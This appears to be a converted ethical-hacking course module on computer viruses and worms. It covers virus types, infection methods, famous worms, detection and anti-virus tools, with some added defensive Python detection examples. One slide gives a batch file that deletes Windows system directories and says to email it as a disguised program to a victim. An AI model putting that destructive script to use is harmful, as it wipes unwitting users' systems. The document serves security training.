16 Virus and Worms


8/14/2019 16 Virus and Worms

1/85

Module XVI: Virus and Worms

Ethical Hacking Version 5


EC-Council Copyright by EC-Council

All Rights reserved. Reproduction is strictly prohibited

Case Study


Module Objective

This module will familiarize you with the following:

Virus

History of Virus

Different characteristics and types of virus

Basic symptoms of virus-like attack

Difference between Virus and Worm

Virus Hoaxes

Indications of virus attacks

Basic working and access methods of virus

Various damages caused by virus

Life cycle of virus

Virus Infection

Various virus detection techniques

Top ten viruses of 2005

Virus incident response


Module Flow

Introduction to Virus

Characteristics and Types of virus

Symptoms of Virus attack

Access methods of virus

Indications of Virus Attack

Virus Hoaxes

Life cycle of virus

Virus Infection

Writing a sample Virus code

Virus Detection and Defenses

Anti-Virus Software

Virus incident response


Introduction to Virus

Computer viruses are perceived as a threat to both business and personal users

A virus is a self-replicating program that propagates its own code by attaching copies of itself to other executable code

It operates without the knowledge or desire of the computer user


Virus History

Year of Discovery: Virus Name

2005: Email-Worm.Win32.Zafi.d, Net-Worm.Win32.Mytob.t

2004: I-Worm.NetSky.r, I-Worm.Bagle.au

2003: Slammer, Sobig, Lovgate, Fizzer, Blaster/Welchia/Mimail

1999: Melissa, Corner, Tristate, & Bubbleboy

1998: Strange Brew & Back Orifice

1995: Concept

1989: AIDS Trojan

1986: Brain, PC-Write Trojan, & Virdem

1983: First Documented Virus

1981: Apple II Virus - First Virus in the wild


Characteristics of a Virus

Resides in memory and replicates itself while the program it is attached to is running

Does not remain in memory after the program has finished executing

Can transform itself by changing its code to appear different

Hides itself from detection in three ways:

Encrypts itself into cryptic symbols

Alters the disk directory data to compensate for the additional virus bytes

Uses stealth algorithms to redirect disk data


Working of Virus

Trigger events and direct attack are the common modes which cause a virus to go off on a target system

Most viruses operate in two phases:

Infection Phase:

Virus developers decide when to infect the host system's programs

Some infect each time they are run and executed completely. Ex: Direct viruses

Some virus codes infect only when users trigger them, which can include a day, a time, or a particular event. Ex: TSR viruses, which get loaded into memory and infect at later stages

Attack Phase:

Some viruses have trigger events to activate and corrupt systems

Some viruses have bugs which replicate and perform activities like file deletion or increasing session time

They corrupt the targets only after spreading completely, as intended by their developers


Working of Virus: Infection Phase

Figure: Attaching to an .EXE file to infect the programs. Left panel, ".EXE File, Before Infection": File Header with IP, Start of Program, End of Program. Right panel, ".EXE File, After Infection": File Header with IP, Start of Program, End of Program, followed by the appended Virus and a Jump back into the program.


Working of Virus: Attack Phase

Figure (source: www.microsoft.com): "Unfragmented File Before Attack" shows File A (pages 1, 2, 3) and File B (pages 1, 2, 3) stored contiguously; "File Fragmentation Due to Virus Attack" shows the pages of File A and File B interleaved on disk. Caption: Slowdown of PC due to fragmented files.


Why do people create computer viruses?

Virus writers can have various reasons for creating and spreading malware

Viruses have been written as:

Research projects

Pranks

Vandalism

To attack the products of specific companies

To distribute political messages

Financial gain

Identity theft

Spyware

Cryptoviral extortion


Symptoms of Virus-Like Attack

If the system acts in an unprecedented manner, you can suspect a virus attack

Example: Processes take more resources and are time consuming

However, not all glitches can be attributed to virus attacks. Examples include:

Certain hardware problems

If the computer beeps with no display

If one out of two anti-virus programs reports a virus on the system

If the label of the hard drive changes

Your computer freezes frequently or encounters errors

Your computer slows down when programs are started

You are unable to load the operating system

Files and folders are suddenly missing or their content changes

Your hard drive is accessed too often (the light on your main unit flashes rapidly)

Microsoft Internet Explorer "freezes"

Your friends mention that they have received messages from you but you never sent such messages


Virus Hoaxes

Hoaxes are false alarms claiming reports about a non-existent virus

Warning messages propagate that a certain email message should not be viewed and that doing so will damage one's system

In some cases, these warning messages themselves contain virus attachments

They possess the capability of vast destruction on target systems

Being largely misunderstood, viruses easily generate myths. Most hoaxes, while deliberately posted, die a quick death because of their outrageous content

Virus Hoaxes

Chain Letters


How is a Worm different from a Virus?

There is a difference between general viruses and worms

A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs

A worm spreads through the infected network automatically, but a virus does not


Indications of Virus Attack

Indications of a virus attack:

Programs take longer to load than normal

Computer's hard drive constantly runs out of free space

Files have strange names which are not recognizable

Programs act erratically

Resources are used up easily


Hardware Threats

Power Faults:

Sudden power failure, voltage spikes, brownouts and frequency shifts cause damage to the system

System Life:

The system gets worn out over a period of time

Equipment Incompatibilities:

These occur due to improperly installed devices

Typos:

Data gets corrupted due to deletion or replacement of the wrong files

Accidental or Malicious Damage:

Data gets deleted or changed accidentally or intentionally by another person

Problems with Magnets:

Magnetic fields from floppy disks, monitors, and telephones can damage stored data


Software Threats

Software Problems:

In a multitasking environment, software conflicts may occur due to sharing of data by all running programs at the same time

There may be damage to information due to misplacement of data in a program

Software Attacks:

Intentionally launched malicious programs enable the attacker to use the computer in an unauthorized manner

General Categories:

Viruses and worms

Logic bombs

Trojans


Virus Damage

Virus damage can be grouped broadly under:

Technical Attributes: The technicalities involved in the modeling and use of a virus cause damage due to:

Lack of control

Difficulty in distinguishing the nature of the attack

Draining of resources

Presence of bugs

Compatibility problems


Virus Damage (contd)

Virus damage can be further attributed to:

Ethical and Legal Reasons: There are ethical and legal considerations that govern why viruses and worms are damaging

Psychological Reasons: These are:

o Trust problems

o Negative influence

Unauthorized data modification

Issue of copyright

Misuse of the virus

Misguidance by virus writers


Modes of Virus Infection

Viruses infect the system in the following ways:

1. The virus loads itself into memory and checks for executables on the disk

2. It appends the malicious code to a legitimate program unbeknownst to the user

3. Since the user is unaware of the replacement, he/she launches the infected program

4. As a result of the infected program being executed, other programs get infected as well

5. The above cycle continues until the user realizes the anomaly within the system


Stages of Virus Life

A computer virus involves various stages, right from its design to its elimination:

Design: Developing the virus code using programming languages or construction kits

Replication: The virus first replicates for a long period of time within the target system and then spreads itself

Launch: It gets activated when the user performs certain actions, like triggering or running an infected program

Detection: The virus is identified as a threat infecting target systems

Incorporation: Anti-virus software developers assimilate defenses against the virus

Elimination: Users are advised to install anti-virus software updates, thus creating awareness among user groups


Virus Classification

Viruses are classified based on the following criteria:

What they infect

How they infect


How does a Virus Infect?

Stealth Virus:

Can hide from anti-virus programs

Polymorphic Virus:

Can change its characteristics with each infection

Cavity Virus:

Maintains the same file size while infecting

Tunneling Virus:

Hides itself under the anti-virus software while infecting

Camouflage Virus:

Disguises itself as a genuine application of the user


Storage Patterns of a Virus

Shell Virus:

The virus code forms a shell around the target host program's code, making itself the original program and the host code its subroutine

Add-on Virus:

Appends its code at the beginning of the host code without making any changes to the latter

Intrusive Virus:

Overwrites the host code partly or completely with viral code

Direct or Transient Virus:

Transfers all control to the host code where it resides

Selects the target program to be modified and corrupts it

Terminate and Stay Resident Virus (TSR):

Remains permanently in memory during the entire work session, even after the target host program is executed and terminated

Can be removed only by rebooting the system


System Sector Viruses

System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC

System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses

These boot viruses use all of the common viral techniques to infect and hide themselves

They rely on an infected floppy disk left in the drive when the computer starts; they can also be "dropped" by some file infectors or Trojans


Stealth Virus

These viruses evade anti-virus software by intercepting its requests to the operating system

A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS

The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean"

Figure: ANTI-VIRUS SOFTWARE asks "Give me the system file tcpip.sys to scan"; the VIRUS, which holds both the Original TCPIP.SYS and the Infected TCPIP.SYS, answers "Here you go" with the original copy


Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk's data content when the system is booted with the infected CD-ROM

Example: Someone might give you a Linux bootable CD-ROM. When you boot the computer using the CD-ROM, all your data is gone

No anti-virus can stop this, because the AV software or the OS is not even loaded when you boot from a CD-ROM

Figure: Boot your computer using the infected virus CD-ROM; your C: drive data is destroyed


Self-Modification

Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them for virus signatures

A signature is a characteristic byte pattern that is part of a certain virus or family of viruses

Self-modifying viruses employ techniques that make detection by means of signatures difficult or impossible

These viruses modify their code on each infection (each infected file contains a different variant of the virus)

Figure: three infected files (Explorer.exe, sales.jpg, Purchase.pdf), each carrying a different variant


Encryption with a Variable Key

This type of virus uses simple encryption to encipher its code

The virus is encrypted with a different key for each infected file

AV scanners cannot directly detect these types of viruses using signature detection methods

Figure: Virus.exe becomes Virus.exe (encrypted)


Polymorphic Code

Polymorphic code is code that mutates while keeping the original algorithm intact

To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine)

A well-written polymorphic virus therefore has no parts that stay the same on each infection


Metamorphic Virus

Metamorphic viruses rewrite themselves completely each time they are to infect new executables

Metamorphic code is code that can reprogram itself by translating its own code into a temporary representation, and then back to normal code again

For example, W32/Simile consisted of over 14,000 lines of assembly code, 90% of it part of the metamorphic engine


Cavity Virus

A cavity virus overwrites a part of the host file that is filled with a constant (usually nulls), without increasing the length of the file, but preserving its functionality

Figure: the host file's null-filled region (rows of "Null") before infection, and the same region holding the virus body after infection. Original File Size: 45 KB; Infected File Size: 45 KB


Sparse Infector Virus

A sparse infector virus infects only occasionally (e.g., every tenth program executed), or only files whose lengths fall within a narrow range

By infecting less often, such viruses try to minimize the probability of being discovered

Figure: "Wake up on the 15th of every month and execute code"


Companion Virus

A companion virus creates a companion file for each executable file the virus infects

Therefore a companion virus may save itself as notepad.com, and every time a user executes notepad.exe (good program), the computer will load notepad.com (virus) and therefore infect the system

Figure: The virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory, beside Notepad.exe


File Extension Virus

File extension viruses change the extensions of files

.TXT is safe as it indicates a pure text file

With extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT

If you've forgotten that extensions are actually turned off, you might think this is a text file and open it

This is really an executable Visual Basic Script virus file and could do serious damage

The countermeasure is to turn off "Hide file extensions" in Windows
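The two disguises on the Companion Virus and File Extension Virus slides (a notepad.com dropped beside notepad.exe, and a double extension such as BAD.TXT.VBS that the Windows "hide file extensions" setting shortens to BAD.TXT) can both be flagged from a plain directory listing. This is an added example, not code from the courseware; the extension sets and the sample listing are constructed assumptions.

```python
import os
from typing import Dict, List

# Assumption: a practical starter set of extensions Windows executes directly, and of
# "document" extensions a user would trust at a glance. Extend both for a real audit.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif"}
DOCUMENT_EXTS = {".txt", ".jpg", ".gif", ".pdf", ".doc", ".xls"}


def displayed_name(filename: str) -> str:
    """What Explorer shows with 'Hide file extensions' on: the last extension is dropped."""
    root, ext = os.path.splitext(filename)
    return root if ext else filename


def is_disguised_executable(filename: str) -> bool:
    """True for names like BAD.TXT.VBS: the real (last) extension is executable, while the
    name the user sees with extensions hidden ends in a harmless document extension."""
    root, ext = os.path.splitext(filename)
    if ext.lower() not in EXECUTABLE_EXTS:
        return False
    _, shown_ext = os.path.splitext(root)
    return shown_ext.lower() in DOCUMENT_EXTS


def find_companions(listing: List[str]) -> List[str]:
    """Return every X.com that sits beside an X.exe in the same directory. The command
    interpreter resolves a bare 'X' to X.com before X.exe, which a companion virus relies on."""
    lowered = {name.lower() for name in listing}
    companions = []
    for name in listing:
        low = name.lower()
        if low.endswith(".com") and low[:-4] + ".exe" in lowered:
            companions.append(name)
    return sorted(companions)


def audit_directory(listing: List[str]) -> Dict[str, List[str]]:
    """Run both checks over one directory listing and report the suspicious names."""
    return {
        "companion_files": find_companions(listing),
        "disguised_executables": sorted(n for n in listing if is_disguised_executable(n)),
    }


# Constructed listing (a system directory plus saved attachments); notepad.com and the
# .VBS names mirror the examples on the slides, everything else is filler.
SAMPLE_LISTING = [
    "notepad.exe", "notepad.com", "calc.exe", "cmd.exe", "tcpip.sys",
    "BAD.TXT.VBS", "LOVE-LETTER-FOR-YOU.TXT.vbs", "virus_warning.jpg.vbs",
    "report.pdf", "readme.txt", "setup.exe",
]

if __name__ == "__main__":
    for name in SAMPLE_LISTING:
        print(f"{displayed_name(name):32} <- {name}")  # what the user sees vs. the real name
    print(audit_directory(SAMPLE_LISTING))
```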


Famous Viruses / Worms: I Love You Virus

Love Letter is a Win32-based email worm. It overwrites certain files on the hard drives and sends itself out to everyone in the Microsoft Outlook address book

Love Letter arrives as an email attachment named LOVE-LETTER-FOR-YOU.TXT.VBS, though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs, and protect.vbs

The viruses discussed here are more of a proof of concept, as they have been instrumental in the evolution of both virus and anti-virus programs

Classic tool presented here for proof of concept


Melissa Virus

Melissa is a Microsoft Word macro virus. Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in the address book

It does not corrupt any data on the hard drive or crash the computer. However, it affects MS Word settings

Melissa arrives as an email attachment. The subject of the message containing the virus reads: "Important message from" followed by the name of the person whose email account it was sent from

The body of the message reads: "Here's the document you asked for...don't show anyone else ;-)". Double-clicking the attached Word document (typically named LIST.DOC) will infect the machine

Classic tool presented here for proof of concept

Melissa Virus Case


Famous Virus/Worms: JS.Spth

JavaScript Internet worm

Propagates via email, ICQ and P2P networks

Kit-Spth is used to produce the JS/SPTH worm

Infection Strategies:

MS Outlook

Morpheus

Grokster

mIRC

pIRC

vIRC

Kazaa

Kazaa-Lite

BearShare

symLink


Klez Virus Analysis - 1

The Klez virus arrives as an email attachment that automatically runs when viewed or previewed in Microsoft Outlook or Outlook Express

It is a memory-resident mass-mailing worm that uses its own SMTP engine to propagate via email

Its email messages arrive with randomly selected subjects

It spoofs its email messages so that they appear to have been sent by certain email accounts, including accounts that are not infected


Klez Virus Analysis - 2

Klez Virus arrives via E-Mail


Klez Virus Analysis - 4

Autorun Techniques

This worm creates the following registry entry so that it executes at every Windows startup:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Winkabc

It registers itself as a process so that it is invisible on the Windows Taskbar

On Windows 2000 and XP, it sets itself as a service by creating the following registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Winkabc


Klez Virus Analysis - 5

Payload

Once the victim's computer is infected, the Klez virus starts propagating itself to other users through the Microsoft Outlook contact list

Figure: the Klez virus fanning out from the infected machine to the addresses in the contact list (addresses redacted)


Writing a Simple Virus Program

1. Create a batch file Game.bat with the following text:

@echo off

del c:\winnt\system32\*.*

del c:\winnt\*.*

2. Convert the Game.bat batch file to Game.com using the bat2com utility

3. Send the Game.com file as an email attachment to a victim

4. When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable


Writing a Test Virus Program

Sometimes it is unacceptable for you to send out real viruses to your network for test or demonstration purposes

EICAR.ORG has created a test virus definition that is harmless and will be picked up by every AV program

Type the following text in Notepad and save the file as eicar.com:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

This file, eicar.com, will be detected as a virus by your AV

You can also download this test virus from http://www.eccouncil.org/cehtools/eicar.zip

Note: This slide is not in your courseware


Virus Construction Kits

Virus creation programs and construction kits can automatically generate viruses

There are a number of virus construction kits available in the wild

Some virus construction kits are:

Kefi's HTML Virus Construction Kit

Virus Creation Laboratory v1.0

The Smeg Virus Construction Kit

Rajaat's Tiny Flexible Mutator v1.1

Windows Virus Creation Kit v1.00

Examples of Virus Construction Kits


Virus Detection Methods

Scanning:

Once a virus has been detected, it is possible to write scanning programs that look for a signature string characteristic of the virus

Integrity Checking:

Integrity checking products work by reading your entire disk and recording integrity data that acts as a signature for the files and system sectors

Interception:

The interceptor monitors operating system requests that write to disk
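Added example, not from the courseware, of the first two methods above run over a constructed file tree: a signature scanner whose only signature is the EICAR test string from the "Writing a Test Virus Program" slide, and a size-plus-SHA-256 integrity baseline. The constructed tree also contains a same-size overwrite of a null region of the kind the Cavity Virus slide describes, which the scanner misses and the integrity check catches; all paths and file contents are made up.

```python
import hashlib
from typing import Dict, List, Tuple

# Signature table: detection name -> characteristic byte pattern. The only entry is the
# EICAR test string from the slides, which anti-virus products detect on purpose.
SIGNATURES: Dict[str, bytes] = {
    "EICAR-Test-File": b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*",
}

# Baseline record per file: (size in bytes, SHA-256 hex digest).
Record = Tuple[int, str]


def scan_file(data: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Scanning method: report every signature whose byte pattern occurs in the file."""
    return [name for name, pattern in signatures.items() if pattern in data]


def scan_tree(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Scan every file in a tree (path -> content); only files with a hit are reported."""
    hits: Dict[str, List[str]] = {}
    for path, data in files.items():
        matched = scan_file(data)
        if matched:
            hits[path] = matched
    return hits


def make_baseline(files: Dict[str, bytes]) -> Dict[str, Record]:
    """Integrity checking method: record size and SHA-256 of every file as its integrity data."""
    return {path: (len(data), hashlib.sha256(data).hexdigest()) for path, data in files.items()}


def check_integrity(baseline: Dict[str, Record], files: Dict[str, bytes]) -> Dict[str, str]:
    """Compare the current tree with the baseline; returns path -> 'modified' | 'new' | 'deleted'."""
    findings: Dict[str, str] = {}
    current = make_baseline(files)
    for path, record in current.items():
        if path not in baseline:
            findings[path] = "new"
        elif record != baseline[path]:
            findings[path] = "modified"
    for path in baseline:
        if path not in current:
            findings[path] = "deleted"
    return findings


# Constructed clean file tree (path -> bytes); tcpip.sys carries a 64-byte null cavity.
CLEAN_TREE: Dict[str, bytes] = {
    "C:/winnt/notepad.exe": b"MZ" + b"\x90" * 40,
    "C:/winnt/system32/tcpip.sys": b"MZ" + b"TCPIP" + b"\x00" * 64 + b"END",
    "C:/data/readme.txt": b"plain text, nothing to see",
}


def infected_tree() -> Dict[str, bytes]:
    """Constructed after-infection state: EICAR appended to notepad.exe (signature visible),
    16 bytes written into the null cavity of tcpip.sys (file size unchanged, no signature),
    and a companion notepad.com dropped beside notepad.exe."""
    tree = dict(CLEAN_TREE)
    tree["C:/winnt/notepad.exe"] = CLEAN_TREE["C:/winnt/notepad.exe"] + SIGNATURES["EICAR-Test-File"]
    host = CLEAN_TREE["C:/winnt/system32/tcpip.sys"]
    cavity = host.index(b"\x00" * 64)
    filler = b"X" * 16  # stands in for code placed in the cavity; total length is unchanged
    tree["C:/winnt/system32/tcpip.sys"] = host[:cavity] + filler + host[cavity + len(filler):]
    tree["C:/winnt/notepad.com"] = b"COMPANION"
    return tree


def demo() -> Tuple[Dict[str, List[str]], Dict[str, str]]:
    """Baseline the clean tree, then run both detection methods against the infected one."""
    baseline = make_baseline(CLEAN_TREE)
    after = infected_tree()
    return scan_tree(after), check_integrity(baseline, after)


if __name__ == "__main__":
    scan_hits, integrity_findings = demo()
    print("signature scan:", scan_hits)            # only the file carrying the EICAR pattern
    print("integrity check:", integrity_findings)  # also the cavity overwrite and the companion
```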


Virus Incident Response

1. Detect the attack: Not all anomalous behavior can be attributed to viruses

2. Trace processes using utilities such as handle.exe, listdlls.exe, fport.exe, netstat.exe, and pslist.exe, and map commonalities between affected systems

3. Detect the virus payload by looking for altered, replaced, or deleted files. New files, changed file attributes, or shared library files should be checked

4. Acquire the infection vector and isolate it. Update the anti-virus and rescan all systems


What is Sheep Dip?

Slang term for a computer which connects to a network only under strictly controlled conditions, and is used for the purpose of running anti-virus checks on suspect files, incoming messages and so on

It may be inconvenient and time-consuming for organizations to give all incoming email attachments a 'health check', but the rapid spread of macro viruses associated with word processor and spreadsheet documents, such as the 'Resume' virus circulating in May 2000, makes this approach worthwhile


Sheep Dip Computer

Figure: the sheep dip computer runs a Port Monitor, a File Monitor, a Registry Monitor and a Network Monitor; the virus is run in this monitored environment


Virus Analysis - IDA Pro Tool

It is a disassembler and debugger tool that supports both Windows and Linux platforms

It is an interactive, programmable, extensible, multi-processor disassembler

Used in the analysis of hostile code, vulnerability research and software reverse engineering

Allows automated unpacking/decrypting of protected binaries

IDA Pro (Virus Disassembler)


Virus Incident Response

1. Detect the attack: Not all anomalous behavior can be attributed to viruses

2. Trace processes using utilities such as handle.exe, listdlls.exe, fport.exe, netstat.exe, and pslist.exe, and map commonalities between affected systems

3. Detect the virus payload by looking for altered, replaced or deleted files. Check new files, changed file attributes or shared library files

4. Acquire the infection vector and isolate it. Update the anti-virus and rescan all systems


Prevention is Better than Cure

Do not accept disks or programs without checking them first using a current version of an anti-viral program

Do not leave a floppy disk in the disk drive longer than necessary

Do not boot the machine with a disk in the disk drive, unless it is a known clean bootable system disk

Keep the anti-virus software up-to-date: upgrade on a regular basis


    W32/Vulgar:
    Overwriting virus with a data-destructive payload
    Attempts to open the default web browser after execution, but results in Internet Explorer crashing

    W32/Feebs.gen@MM:
    Email worm that configures itself to load at startup
    Spreads itself by email attachment and infects the system after execution of the attachment

    W32/HLLP.zori.c@M:
    Parasitic file infector and mailing worm
    Possesses backdoor functionality that allows unauthorized remote access

    Top 10 Viruses - 2006


    Email-Worm.Win32.Zafi.d

    Net-Worm.Win32.Mytob.c

    Email-Worm.Win32.LovGate.w

    Email-Worm.Win32.Sober.v

    Email-Worm.Win32.Zafi.b

    Email-Worm.Win32.NetSky.b

    Email-Worm.Win32.NetSky.g

    Net-Worm.Win32.Mytob.t

    Net-Worm.Win32.Mytob.u

    Net-Worm.Win32.Mytob.g

    Anti-Virus Software


    There are many anti-virus software vendors. Here is a list of some freely available anti-virus software for personal use:

    AVG Free Edition
    Norton Antivirus
    AntiVir Personal Edition
    Bootminder
    Panda Active Scan

    One of the preventions against viruses is to install anti-virus software and keep the updates current

    AVG Antivirus


    Product of www.grisoft.com

    Menus in Basic Interface:
    Program menu
    Tests menu
    Results menu
    Service menu
    Information menu

    AVG Settings and Features:
    Program settings
    Test properties
    Test results
    Task scheduler
    Update manager


    AVG Antivirus


    Norton Antivirus


    Product of www.symantec.com

    Features:
    Protects from viruses, and updates virus definitions automatically
    Detects and repairs viruses in emails, instant messenger attachments and compressed folders
    Monitors network traffic for malicious activity

    Norton Antivirus provides the following scan options:
    Full system scan
    Custom scan
    Scheduled scan
    Scan from the command line


    McAfee


    Product of www.mcafee.com

    Features:
    SpamKiller: Stops spam from infecting the inbox
    SecurityCenter: Lists computer security vulnerabilities and offers free real-time security alerts
    VirusScan:
    ActiveShield: Scans files in real time
    Quarantine: Encrypts the infected files in the quarantine folder
    Hostile Activity Detection: Examines the computer for malicious activity

    McAfee SpamKiller


    McAfee SecurityCenter


    McAfee VirusScan


    Socketshield


    SocketShield is a zero-day exploit blocker
    SocketShield can block exploits from entering the computer, regardless of how long it takes for the vendors of vulnerable applications to issue patches
    http://www.explabs.com


    Popular Anti-Virus Packages


    Aladdin Knowledge Systems: http://www.esafe.com/
    Central Command, Inc.: http://www.centralcommand.com/
    Computer Associates International, Inc.: http://www.cai.com
    Frisk Software International: http://www.f-prot.com/
    F-Secure Corporation: http://www.f-secure.com
    Trend Micro, Inc.: http://www.trendmicro.com
    Norman Data Defense Systems: http://www.norman.com
    Panda Software: http://www.pandasoftware.com/
    Proland Software: http://www.pspl.com
    Sophos: http://www.sophos.com

    Virus Databases


    The following databases can be useful if you are looking for specific information about a particular virus

    Proland - Virus Encyclopedia: http://www.pspl.com/virus_info/
    Norman - Virus Encyclopedia: http://www.norman.com/Virus/en-us
    AVG - Virus Encyclopedia: http://www.grisoft.com/doc/Virus+Encyclopaedia/lng/us/tpl/tpl01
    Virus Bulletin - Virus Encyclopedia: https://www.virusbtn.com/login
    F-Secure Virus Info Center: http://www.f-secure.com/vir-info/
    McAfee - Virus Information Library: http://vil.mcafee.com/
    Panda Software - Virus Encyclopedia: http://www.pandasoftware.com/library/
    Sophos Virus Information: http://www.sophos.com/virusinfo/
    Symantec AntiVirus Research Center: http://www.symantec.com/avcenter/index.html
    Trend Micro - Virus Encyclopedia: http://www.antivirus.com/vinfo/virusencyclo/default.asp

    What Happened Next?


    The next day, when he switched on his system, Ricky was surprised at its irregular behavior. His system was hanging frequently and strange error messages were popping up. He suspected a virus attack on his system. He updated his anti-virus software, which he had not updated for a long time, and scanned the system. The scan result showed that his system was infected by a deadly virus.

    Summary


    Viruses come in different forms
    Some are mere nuisances, others come with devastating consequences
    Email worms are self-replicating, and clog networks with unwanted traffic
    Virus codes are not necessarily complex
    It is necessary to scan the systems/networks for infections on a periodic basis for protection against viruses
    Antidotes to new virus releases are promptly made available by security companies, and this forms the major countermeasure
